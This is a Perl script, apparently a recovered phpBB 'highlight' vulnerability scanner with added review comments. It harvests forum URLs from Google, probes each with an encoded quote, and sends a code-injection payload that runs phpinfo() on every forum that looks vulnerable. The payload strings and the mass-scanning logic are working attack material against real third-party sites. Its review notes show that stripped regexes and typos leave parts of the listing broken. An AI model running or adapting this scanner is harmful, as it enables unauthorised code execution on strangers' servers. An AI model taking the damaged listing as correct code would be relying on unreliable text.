#!/usr/bin/perl
# phpBB "highlight" vulnerability scanner by simkin at badchecksum, v 0.2
# Requires libwww-perl (Debian package libwww-perl).
#
# What the script does, as written:
#   1. pages through Google (google.es) results for "viewtopic+<keyword>" and
#      keeps every result URL containing "viewtopic.php?t=";
#   2. drops URLs that differ only in their topic number (one URL per forum);
#   3. requests each forum with "&highlight=%2527" appended (a double-URL-encoded
#      single quote) and treats a "Parse error" in the response as a hit;
#   4. if $check_safe_mode is set, sends a second highlight= payload that calls
#      phpinfo() to every hit and looks for the safe_mode row in the reply.
#      Every such reply body is appended to ./outputa.txt.
#
# NOTE(review): this listing was recovered from a web page and several regex
# literals (the m/()/ and m//g in the Google loop, and the two-newline pattern
# that ends it) appear to have lost their pattern text -- most likely HTML tags
# that were stripped during extraction. As it stands the result harvesting
# cannot work; see the inline notes. The code below is left byte-for-byte
# as found and only commented, so the defects are flagged, not fixed.
# NOTE(review): no `use strict; use warnings;` -- the typos $ouputopt and
# $forumulr noted below are exactly the kind of error strict would catch.

## options
$verbose = 1;           # print every probed URL, tagging hits with "VULN"
$check_safe_mode = 1;   # after scanning, send the phpinfo() payload to each hit
$ouputopt = 0;          # NOTE(review): typo -- the code at the bottom tests $outputopt,
                        # so this flag has no effect and the URL list is never written
$lang = "lang_en";      # value for Google's "lr=" (language restrict) parameter
## options

use LWP;                # also brings in HTTP::Request, which is used but never required
require HTTP::Headers;
require LWP::UserAgent;

print "\n\n";
# Exactly one argument is expected: the search keyword. The usage string has
# presumably lost a "<keyword>" placeholder during extraction.
if(($#ARGV + 1) < 1) {
    die "usage: phpbbscan \n";
}

# The keyword is taken from argv as-is -- no validation, no URL-encoding --
# and interpolated straight into the Google query URL below.
$keyword = "viewtopic+";
$keyword .= shift;

@saved_urls;    # no-op (bare array in void context); the array is created by push below
# Google search URL fragments: base?q=, &lr=, &start=, &sa=N
@query = ('http://www.google.es/search?q=','&lr=','&start=','&sa=N');

# Browser-lookalike client: Firefox 1.0 user agent, 10 s timeout, and a cap on
# how much of each response body is read (LWP::UserAgent max_size).
$usr_agent = LWP::UserAgent->new('agent'=>'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041219 Firefox/1.0 (Debian package 1.0+dfsg.1-1)');
$usr_agent->timeout(10);
$usr_agent->max_size(60000);

# Fixed header set used for every Google request, mimicking the browser above.
# NOTE(review): Host is hard-coded to www.google.com while @query targets
# www.google.es -- LWP may send this explicit header as-is instead of deriving
# it from the URI; confirm before relying on it.
$hdr = HTTP::Headers->new(
    'Host' => 'www.google.com',
    'Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
    'Accept-Language' => 'es,en-us;q=0.7,en;q=0.3',
    #'Accept-Encoding' => 'gzip,deflate',   # presumably left off so the body arrives uncompressed for the regexes
    'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Keep-Alive' => '300',
    'Connection' => 'keep-alive',
    'Referer' => 'http://www.google.com/search?q=sfa&hl=es&lr=&start=20&sa=N');
    #'Cookie' => 'PREF=ID=5f5847dd68df26eb:LD=es:TM=1101158153:LM=1101158154:S=6ReB7d9_FtbKU-Mq');

print (":] phpbbscan: Recogiendo urls de google... \n");   # "collecting urls from google"

# Walk the result pages 10 at a time. There is no upper bound: the loop ends
# only through `last` (end-of-results pattern) or `exit` (no results on page 1).
for($i = 0;;$i += 10) {
    $urlget = "$query[0]$keyword$query[1]$lang$query[2]$i$query[3]";
    $request = HTTP::Request->new(GET =>$urlget,$hdr);
    $response = $usr_agent->request($request);
    $plain_html = $response->content;

    # First page only: bail out when Google reports no results.
    # NOTE(review): the pattern is now an empty group `()`, which matches any
    # string, so this "no results" branch is unreachable as written.
    if(!$i) {
        if(!($plain_html =~ m/()/)) {
            print ":( phpbbscan: no hay resultados.\n\n";   # "no results"
            exit;
        }
    }

    # Extract result links and keep those pointing at viewtopic.php?t=.
    # NOTE(review): in Perl an empty pattern reuses the last successfully
    # matched regex (here `()` from above), not "match nothing"; $1 will then
    # be the empty string and the viewtopic test never passes, so no URLs are
    # collected. The original was presumably an <a href=...> extractor whose
    # tag text was stripped.
    while($plain_html =~ m//g) {
        $url = $1;
        if($1 =~ m/viewtopic.php\?t=/) {
            push(@saved_urls,$url);
        }
    }

    # Stop when the "last page" marker is seen.
    # NOTE(review): the pattern between m/ and / is now just two newline
    # characters (its HTML was stripped), so the loop stops on the first page
    # that contains a blank line.
    if($plain_html =~ m/

/) {
        print "O_o phpbbscan: Recogidas ".@saved_urls." urls de google.\n";   # "collected N urls"
        last;
    }
}

print ":] phpbbscan: Eliminando las urls repetidas...\n";   # "removing duplicate urls"

# Deduplicate by forum: two URLs are "the same" when the text before the last
# `t=<digit>` is equal, i.e. they differ only in the topic number. The first
# element always survives because @clean_urls is empty on the first pass.
# NOTE(review): if either regex fails to match, $1 keeps its previous value
# and the comparison is made against stale data. O(n^2), acceptable here.
foreach $lmnt (@saved_urls) {
    $nomatches = 1;
    foreach $_lmnt (@clean_urls) {
        $lmnt =~ m/(.*)t=[0-9]/;
        $lmnt_notopicnum = $1;
        $_lmnt =~ m/(.*)t=[0-9]/;
        $_lmnt_notopicnum = $1;
        if($lmnt_notopicnum eq $_lmnt_notopicnum) {
            $nomatches = 0;
        }
    }
    if($nomatches) {
        push(@clean_urls,$lmnt);
    }
}

print "o_O phpbbscan: ".@clean_urls." urls validas.\n";                # "N valid urls"
print ":] phpbbscan: Buscando foros vulnerables...\n\n";              # "looking for vulnerable forums"

# Probe: a double-URL-encoded single quote in the highlight parameter.
$exp = "&highlight=%2527";
@final_urls;    # no-op, as with @saved_urls above

# Probe every deduplicated forum URL once.
foreach $forumurl (@clean_urls) {
    # NOTE(review): `htt[ps]` is a character class -- it matches "http://" and
    # "htts://" but never "https://", so $host is undef for https forums.
    ($host) = $forumurl =~ m!htt[ps]:\/\/(.*?)\/!;
    # NOTE(review): typo `$forumulr` (never assigned) -- $url is always undef,
    # so the Referer header below is sent undefined.
    ($url) = $forumulr =~ m/(.*\.php)/;
    # Everything after the topic number is dropped, then the probe is appended.
    ($urlget) = $forumurl =~ m/(.*\?t=[0-9]*)/;
    $urlget .= $exp;

    # Same browser-lookalike headers, now addressed to the forum host.
    $hdr = HTTP::Headers->new(
        'Host' => $host,
        'Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
        'Accept-Language' => 'es,en-us;q=0.7,en;q=0.3',
        'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
        'Keep-Alive' => '300',
        'Connection' => 'keep-alive',
        'Referer' => $url);
    $request = HTTP::Request->new(GET =>$urlget,$hdr);
    $response = $usr_agent->request($request);
    $plain_html = $response->content;

    # A PHP "Parse error" anywhere in the reply is taken as the vulnerability
    # indicator. Any page that happens to contain those words is a false
    # positive; nothing else is checked (no status code, no content type).
    if($plain_html =~ m/[pP]arse error/) {
        if($verbose) {
            print "$urlget VULN\n";
        }
        push(@final_urls,$forumurl);
    } else {
        if($verbose) {
            print "$urlget\n";
        }
    }
}

# "Search finished. At least N vulnerable site(s)." -- the literal contains a
# line break inside the string.
print "\n:) Busqueda finalizada. Hay por lo menos ".@final_urls." 
sitio(s) vulnerables.\n";

# Optional second stage: ask each hit to run phpinfo() and read safe_mode.
if($check_safe_mode) {
    print "\n :E Comprobando si safe_mode esta activado:\n\n";   # "checking whether safe_mode is on"
    # Double-encoded payload; after two URL decodes it reads '.print(phpinfo()).'
    $phpinfo = "&highlight=%2527%252Eprint(phpinfo())%252e%2527";
    foreach $vulnurl(@final_urls) {
        print "$vulnurl:\n";
        # NOTE(review): copy/paste error -- these two lines use $forumurl (left
        # over from the previous loop, i.e. the last forum scanned) instead of
        # $vulnurl, so every request here carries the wrong Host header. The
        # same `htt[ps]` and `$forumulr` defects as above apply.
        ($host) = $forumurl =~ m!htt[ps]:\/\/(.*?)\/!;
        ($url) = $forumulr =~ m/(.*\.php)/;
        ($urlget) = $vulnurl =~ m/(.*\?t=[0-9]*)/;
        $urlget .= $phpinfo;
        $hdr = HTTP::Headers->new(
            'Host' => $host,
            'Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
            'Accept-Language' => 'es,en-us;q=0.7,en;q=0.3',
            'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
            'Keep-Alive' => '300',
            'Connection' => 'keep-alive',
            'Referer' => $url);
        $request = HTTP::Request->new(GET=>$urlget,$hdr);
        $response = $usr_agent->request($request);
        $plain_html = $response->content;

        # Debug dump: the whole reply body of every target is appended to
        # ./outputa.txt in the current directory, unconditionally.
        # NOTE(review): two-argument open on a bareword handle with no error
        # check (see the checked three-argument form at the end of the file).
        open(GAY,">> ./outputa.txt");
        print GAY $plain_html;
        close(GAY);

        # Look for the safe_mode row of the phpinfo() table and read the cell
        # that follows the label. /m only affects ^ and $, which are not used.
        # NOTE(review): `$1 eq "Off"` requires the captured cell to be exactly
        # "Off" with no markup, and the lazy `[Ofn]*?` after it suggests a
        # different layout was intended -- verify against real phpinfo() HTML.
        if($plain_html =~ m/safe_mode<\/td>(.*?)<\/td>[Ofn]*?<\/td><\/tr>/m) {
            if($1 eq "Off") {
                print "Safe_mode desactivado :)\n\n";   # "safe_mode disabled"
            } else {
                print "Safe_mode activado :(\n\n";      # "safe_mode enabled"
            }
        } else {
            print "Error. perhaps phpinfo not working??\n\n";
        }
    }
}

# Write the hit list, one URL per line.
# NOTE(review): never reached -- $outputopt is undefined (the option above is
# spelled $ouputopt). The die message also names output.txt while the file
# actually opened is outputa.txt.
if($outputopt) {
    $output = join("\n",@final_urls);
    open(GAY,">> ./outputa.txt") || die "No pudo abrirse output.txt: $!";   # "could not open"
    print GAY $output;
    close(GAY);
}